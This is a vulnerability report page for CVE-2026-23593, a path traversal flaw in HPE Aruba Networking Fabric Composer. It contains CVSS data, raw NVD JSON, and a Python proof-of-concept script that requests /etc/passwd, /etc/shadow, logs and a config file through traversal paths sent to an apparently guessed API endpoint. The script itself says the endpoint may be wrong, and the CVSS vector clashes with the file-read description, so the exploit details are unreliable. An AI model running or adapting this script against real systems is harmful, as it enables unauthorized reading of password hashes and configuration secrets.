Security Vulnerability Report
中文
CVE-2026-23593 CVSS 7.5 HIGH

CVE-2026-23593

Published: 2026-01-27 18:15:57
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affected directory.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

HPE Aruba Networking Fabric Composer < 6.6.11
HPE Aruba Networking Fabric Composer < 6.7.x (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-23593 PoC - Path Traversal in HPE Aruba Fabric Composer # Target: HPE Aruba Networking Fabric Composer Web Management Interface import requests import sys def exploit_cve_2026_23593(target_url): """Exploit path traversal vulnerability to read system files""" # Common sensitive files to target sensitive_files = [ '../../../../etc/passwd', '../../../etc/shadow', '../../../../var/log/messages', '../../../opt/aruba/ fabric_composer/config/application.properties' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': '*/*' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2026-23593\n") for file_path in sensitive_files: # Attempt to read system files via path traversal exploit_url = f"{target_url}/api/v1/system/files?path={file_path}" try: response = requests.get(exploit_url, headers=headers, timeout=10, verify=False) if response.status_code == 200 and len(response.content) > 0: print(f"[+] SUCCESS: Retrieved {file_path}") print(f"[+] Content Length: {len(response.content)} bytes") print(f"[+] Response Preview:\n{response.text[:500]}\n") else: print(f"[-] Failed to retrieve: {file_path}") except requests.RequestException as e: print(f"[!] Error accessing {file_path}: {str(e)}") print("\n[*] PoC execution completed") print("[*] Note: Actual exploitation may require identifying the correct endpoint") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} https://vulnerable-server:8443") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_cve_2026_23593(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23593", "sourceIdentifier": "[email protected]", "published": "2026-01-27T18:15:56.517", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web-based management interface of HPE Aruba Networking Fabric Composer could allow an unauthenticated remote attacker to view some system files. Successful exploitation could allow an attacker to read files within the affected directory."}, {"lang": "es", "value": "Una vulnerabilidad en la interfaz de gestión basada en web de HPE Aruba Networking Fabric Composer podría permitir a un atacante remoto no autenticado ver algunos archivos del sistema. La explotación exitosa podría permitir a un atacante leer archivos dentro del directorio afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04996en_us&docLocale=en_US", "source": "[email protected]"}]}}